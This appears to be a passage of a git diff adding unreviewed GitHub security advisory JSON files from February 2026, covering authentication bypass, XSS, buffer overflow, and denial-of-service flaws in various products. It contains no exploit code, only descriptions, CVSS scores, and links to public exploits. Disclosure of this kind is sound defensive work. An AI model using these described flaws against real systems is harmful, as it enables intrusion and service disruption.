a/advisories/unreviewed/2026/02/GHSA-v6q3-r5cf-wh3r/GHSA-v6q3-r5cf-wh3r.json b/advisories/unreviewed/2026/02/GHSA-v6q3-r5cf-wh3r/GHSA-v6q3-r5cf-wh3r.json new file mode 100644 index 0000000000000..c2f7254e107ff --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v6q3-r5cf-wh3r/GHSA-v6q3-r5cf-wh3r.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v6q3-r5cf-wh3r", + "modified": "2026-02-19T18:31:54Z", + "published": "2026-02-19T18:31:54Z", + "aliases": [ + "CVE-2025-8350" + ], + "details": "Execution After Redirect (EAR), Missing Authentication for Critical Function vulnerability in Inrove Software and Internet Services BiEticaret CMS allows Authentication Bypass, HTTP Response Splitting.This issue affects BiEticaret CMS: from 2.1.13 through 19022026.\n\nNOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8350" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-26-0077" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-306" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T12:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v7gv-95cv-hv8j/GHSA-v7gv-95cv-hv8j.json b/advisories/unreviewed/2026/02/GHSA-v7gv-95cv-hv8j/GHSA-v7gv-95cv-hv8j.json new file mode 100644 index 0000000000000..ef311d498c8c4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v7gv-95cv-hv8j/GHSA-v7gv-95cv-hv8j.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v7gv-95cv-hv8j", + "modified": "2026-02-11T21:30:41Z", + "published": "2026-02-11T21:30:41Z", + "aliases": [ + "CVE-2020-37201" + ], + "details": "NetShareWatcher 1.5.8.0 contains a buffer overflow vulnerability in the registration name input that allows attackers to crash the application. Attackers can generate a 1000-character payload and paste it into the 'Name' field to trigger an application crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37201" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47848" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/netsharewatcher-name-denial-of-service" + }, + { + "type": "WEB", + "url": "http://www.nsauditor.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v7h8-7wpg-c8vx/GHSA-v7h8-7wpg-c8vx.json b/advisories/unreviewed/2026/02/GHSA-v7h8-7wpg-c8vx/GHSA-v7h8-7wpg-c8vx.json new file mode 100644 index 0000000000000..6d428e6fac0a1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v7h8-7wpg-c8vx/GHSA-v7h8-7wpg-c8vx.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v7h8-7wpg-c8vx", + "modified": "2026-02-19T21:30:45Z", + "published": "2026-02-19T18:31:53Z", + "aliases": [ + "CVE-2026-25399" + ], + "details": "Missing Authorization vulnerability in CryoutCreations Serious Slider cryout-serious-slider allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Serious Slider: from n/a through <= 1.2.7.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25399" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/cryout-serious-slider/vulnerability/wordpress-serious-slider-plugin-1-2-7-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v844-6465-jhqh/GHSA-v844-6465-jhqh.json b/advisories/unreviewed/2026/02/GHSA-v844-6465-jhqh/GHSA-v844-6465-jhqh.json new file mode 100644 index 0000000000000..f111ce7323737 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v844-6465-jhqh/GHSA-v844-6465-jhqh.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v844-6465-jhqh", + "modified": "2026-02-14T18:30:14Z", + "published": "2026-02-14T18:30:14Z", + "aliases": [ + "CVE-2026-23136" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: reset sparse-read state in osd_fault()\n\nWhen a fault occurs, the connection is abandoned, reestablished, and any\npending operations are retried. The OSD client tracks the progress of a\nsparse-read reply using a separate state machine, largely independent of\nthe messenger's state.\n\nIf a connection is lost mid-payload or the sparse-read state machine\nreturns an error, the sparse-read state is not reset. The OSD client\nwill then interpret the beginning of a new reply as the continuation of\nthe old one. If this makes the sparse-read machinery enter a failure\nstate, it may never recover, producing loops like:\n\n libceph: [0] got 0 extents\n libceph: data len 142248331 != extent len 0\n libceph: osd0 (1)...:6801 socket error on read\n libceph: data len 142248331 != extent len 0\n libceph: osd0 (1)...:6801 socket error on read\n\nTherefore, reset the sparse-read state in osd_fault(), ensuring retries\nstart from a clean state.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23136" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/10b7c72810364226f7b27916ea3e2a4f870bc04b" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/11194b416ef95012c2cfe5f546d71af07b639e93" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/90a60fe61908afa0eaf7f8fcf1421b9b50e5f7ff" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/e94075e950a6598e710b9f7dffea5aa388f40313" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T16:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v88q-2f34-49rp/GHSA-v88q-2f34-49rp.json b/advisories/unreviewed/2026/02/GHSA-v88q-2f34-49rp/GHSA-v88q-2f34-49rp.json new file mode 100644 index 0000000000000..ce39fe6526922 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v88q-2f34-49rp/GHSA-v88q-2f34-49rp.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v88q-2f34-49rp", + "modified": "2026-02-14T06:30:57Z", + "published": "2026-02-14T06:30:57Z", + "aliases": [ + "CVE-2026-26299" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26299" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T04:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v929-j8mj-vc74/GHSA-v929-j8mj-vc74.json b/advisories/unreviewed/2026/02/GHSA-v929-j8mj-vc74/GHSA-v929-j8mj-vc74.json new file mode 100644 index 0000000000000..25e79b3d76e98 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v929-j8mj-vc74/GHSA-v929-j8mj-vc74.json @@ -0,0 +1,34 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v929-j8mj-vc74", + "modified": "2026-02-17T21:31:15Z", + "published": "2026-02-17T21:31:15Z", + "aliases": [ + "CVE-2026-23598" + ], + "details": "Vulnerabilities in the API error handling of an HPE Aruba Networking 5G Core server API could allow an unauthenticated remote attacker to obtain sensitive information. Successful exploitation could allow an attacker to access details such as user accounts, roles, and system configuration, as well as to gain insight into internal services and workflows, increasing the risk of unauthorized access and elevated privileges when combined with other vulnerabilities.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23598" + }, + { + "type": "WEB", + "url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05002en_us&docLocale=en_US" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T21:22:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v93q-388x-pr6x/GHSA-v93q-388x-pr6x.json b/advisories/unreviewed/2026/02/GHSA-v93q-388x-pr6x/GHSA-v93q-388x-pr6x.json new file mode 100644 index 0000000000000..a02af78a39154 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v93q-388x-pr6x/GHSA-v93q-388x-pr6x.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v93q-388x-pr6x", + "modified": "2026-02-19T15:30:34Z", + "published": "2026-02-19T15:30:34Z", + "aliases": [ + "CVE-2019-25411" + ], + "details": "Comodo Dome Firewall 2.7.0 contains a reflected cross-site scripting vulnerability that allows attackers to inject malicious scripts by manipulating the GATEWAY_GREEN parameter. Attackers can send POST requests to the DHCP configuration endpoint with script payloads to execute arbitrary JavaScript in administrator browsers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25411" + }, + { + "type": "WEB", + "url": "https://cdome.comodo.com/firewall" + }, + { + "type": "WEB", + "url": "https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9278&af=9278" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46408" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/comodo-dome-firewall-cross-site-scripting-via-dhcp" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T13:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v98v-vv3v-hfhg/GHSA-v98v-vv3v-hfhg.json b/advisories/unreviewed/2026/02/GHSA-v98v-vv3v-hfhg/GHSA-v98v-vv3v-hfhg.json new file mode 100644 index 0000000000000..640cbca573ee4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v98v-vv3v-hfhg/GHSA-v98v-vv3v-hfhg.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v98v-vv3v-hfhg", + "modified": "2026-02-13T21:31:38Z", + "published": "2026-02-13T21:31:38Z", + "aliases": [ + "CVE-2025-35997" + ], + "details": "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority because it is Unused", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-35997" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T19:16:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v99r-49f4-6c26/GHSA-v99r-49f4-6c26.json b/advisories/unreviewed/2026/02/GHSA-v99r-49f4-6c26/GHSA-v99r-49f4-6c26.json new file mode 100644 index 0000000000000..475e027ab876a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v99r-49f4-6c26/GHSA-v99r-49f4-6c26.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v99r-49f4-6c26", + "modified": "2026-02-12T15:32:42Z", + "published": "2026-02-11T15:30:25Z", + "aliases": [ + "CVE-2025-53598" + ], + "details": "A NULL pointer dereference vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53598" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v9g2-54rr-mxmg/GHSA-v9g2-54rr-mxmg.json b/advisories/unreviewed/2026/02/GHSA-v9g2-54rr-mxmg/GHSA-v9g2-54rr-mxmg.json new file mode 100644 index 0000000000000..b47498da8485d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v9g2-54rr-mxmg/GHSA-v9g2-54rr-mxmg.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v9g2-54rr-mxmg", + "modified": "2026-02-12T18:30:23Z", + "published": "2026-02-12T00:31:05Z", + "aliases": [ + "CVE-2026-20661" + ], + "details": "An authorization issue was addressed with improved state management. This issue is fixed in iOS 26.3 and iPadOS 26.3, iOS 18.7.5 and iPadOS 18.7.5. An attacker with physical access to a locked device may be able to view sensitive user information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20661" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-285" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v9v3-ph54-r6qw/GHSA-v9v3-ph54-r6qw.json b/advisories/unreviewed/2026/02/GHSA-v9v3-ph54-r6qw/GHSA-v9v3-ph54-r6qw.json new file mode 100644 index 0000000000000..2c7dde687eabd --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v9v3-ph54-r6qw/GHSA-v9v3-ph54-r6qw.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v9v3-ph54-r6qw", + "modified": "2026-02-19T18:31:54Z", + "published": "2026-02-19T18:31:54Z", + "aliases": [ + "CVE-2026-2718" + ], + "details": "The Dealia – Request a Quote plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Gutenberg block attributes in all versions up to, and including, 1.0.6. This is due to the use of `wp_kses()` for output escaping within HTML attribute contexts where `esc_attr()` is required. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2718" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/dealia-request-a-quote/tags/1.0.6/functions.php#L9" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/dealia-request-a-quote/tags/1.0.6/templates/widgets/dealia-nonproduct-button.php#L7" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/dealia-request-a-quote/trunk/functions.php#L9" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/dealia-request-a-quote/trunk/templates/widgets/dealia-nonproduct-button.php#L7" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/617785d7-90b1-482c-bfff-9b5a63741415?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T10:16:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vc34-g972-8h6w/GHSA-vc34-g972-8h6w.json b/advisories/unreviewed/2026/02/GHSA-vc34-g972-8h6w/GHSA-vc34-g972-8h6w.json new file mode 100644 index 0000000000000..23e47bf5abd5b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vc34-g972-8h6w/GHSA-vc34-g972-8h6w.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vc34-g972-8h6w", + "modified": "2026-02-13T21:31:40Z", + "published": "2026-02-13T21:31:40Z", + "aliases": [ + "CVE-2025-68124" + ], + "details": "Rejected reason: reserved but not needed", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68124" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T21:16:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vcj6-96x2-26j3/GHSA-vcj6-96x2-26j3.json b/advisories/unreviewed/2026/02/GHSA-vcj6-96x2-26j3/GHSA-vcj6-96x2-26j3.json new file mode 100644 index 0000000000000..9a1c8c221619a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vcj6-96x2-26j3/GHSA-vcj6-96x2-26j3.json @@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vcj6-96x2-26j3", + "modified": "2026-02-18T12:31:11Z", + "published": "2026-02-18T12:31:11Z", + "aliases": [ + "CVE-2026-2653" + ], + "details": "A security flaw has been discovered in admesh up to 0.98.5. This issue affects the function stl_check_normal_vector of the file src/normals.c. Performing a manipulation results in heap-based buffer overflow. The attack must be initiated from a local position. The exploit has been released to the public and may be used for attacks. It looks like this product is not really maintained anymore.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2653" + }, + { + "type": "WEB", + "url": "https://github.com/admesh/admesh/issues/65" + }, + { + "type": "WEB", + "url": "https://github.com/admesh/admesh/issues/65#issuecomment-3804571402" + }, + { + "type": "WEB", + "url": "https://github.com/admesh/admesh" + }, + { + "type": "WEB", + "url": "https://github.com/user-attachments/files/24878279/id.000035.sig.06.src.000550.time.910126.execs.241742.op.havoc.rep.5.zip" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346450" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346450" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752596" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T11:16:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vf6g-mr63-q5rh/GHSA-vf6g-mr63-q5rh.json b/advisories/unreviewed/2026/02/GHSA-vf6g-mr63-q5rh/GHSA-vf6g-mr63-q5rh.json new file mode 100644 index 0000000000000..fea243d197093 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vf6g-mr63-q5rh/GHSA-vf6g-mr63-q5rh.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vf6g-mr63-q5rh", + "modified": "2026-02-11T21:30:41Z", + "published": "2026-02-11T21:30:41Z", + "aliases": [ + "CVE-2020-37198" + ], + "details": "Duplicate Cleaner Pro 4.1.3 contains a denial of service vulnerability that allows attackers to crash the application by injecting an oversized buffer into the license key field. Attackers can generate a 6000-byte payload and paste it into the license activation field to trigger an application crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37198" + }, + { + "type": "WEB", + "url": "https://www.digitalvolcano.co.uk/index.html" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47873" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/duplicate-cleaner-pro-denial-of-service" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vf83-6p8j-54f5/GHSA-vf83-6p8j-54f5.json b/advisories/unreviewed/2026/02/GHSA-vf83-6p8j-54f5/GHSA-vf83-6p8j-54f5.json new file mode 100644 index 0000000000000..797cab9aa94ab --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vf83-6p8j-54f5/GHSA-vf83-6p8j-54f5.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vf83-6p8j-54f5", + "modified": "2026-02-19T18:31:53Z", + "published": "2026-02-19T18:31:53Z", + "aliases": [ + "CVE-2026-27055" + ], + "details": "Missing Authorization vulnerability in PenciDesign Penci AI SmartContent Creator penci-ai allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Penci AI SmartContent Creator: from n/a through <= 2.0.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27055" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/penci-ai/vulnerability/wordpress-penci-ai-smartcontent-creator-plugin-2-0-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vf98-8xxx-fp8w/GHSA-vf98-8xxx-fp8w.json b/advisories/unreviewed/2026/02/GHSA-vf98-8xxx-fp8w/GHSA-vf98-8xxx-fp8w.json new file mode 100644 index 0000000000000..55d1065a4f5fd --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vf98-8xxx-fp8w/GHSA-vf98-8xxx-fp8w.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vf98-8xxx-fp8w", + "modified": "2026-02-12T18:30:21Z", + "published": "2026-02-11T15:30:26Z", + "aliases": [ + "CVE-2025-66274" + ], + "details": "A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.\n\nWe have already fixed the vulnerability in the following version:\nQuTS hero h5.3.2.3354 build 20251225 and later", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66274" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-08" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vfcp-69jm-85xv/GHSA-vfcp-69jm-85xv.json b/advisories/unreviewed/2026/02/GHSA-vfcp-69jm-85xv/GHSA-vfcp-69jm-85xv.json new file mode 100644 index 0000000000000..016f1de2f6a51 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vfcp-69jm-85xv/GHSA-vfcp-69jm-85xv.json @@ -0,0 +1,25 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vfcp-69jm-85xv", + "modified": "2026-02-18T06:30:18Z", + "published": "2026-02-18T06:30:18Z", + "aliases": [ + "CVE-2026-27034" + ], + "details": "Rejected reason: Not used", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27034" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T04:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vfjm-qj84-h7cw/GHSA-vfjm-qj84-h7cw.json b/advisories/unreviewed/2026/02/GHSA-vfjm-qj84-h7cw/GHSA-vfjm-qj84-h7cw.json new file mode 100644 index 0000000000000..d7ab563087612 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vfjm-qj84-h7cw/GHSA-vfjm-qj84-h7cw.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vfjm-qj84-h7cw", + "modified": "2026-02-18T00:30:16Z", + "published": "2026-02-18T00:30:16Z", + "aliases": [ + "CVE-2025-33088" + ], + "details": "IBM Concert 1.0.0 through 2.1.0 could allow a local user with specific knowledge about the system's architecture to escalate their privileges due to incorrect file permissions for critical resources.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33088" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7260161" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T22:18:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vfjw-j4jg-frr6/GHSA-vfjw-j4jg-frr6.json b/advisories/unreviewed/2026/02/GHSA-vfjw-j4jg-frr6/GHSA-vfjw-j4jg-frr6.json new file mode 100644 index 0000000000000..427ae6c66b664 --- /dev/null +++ 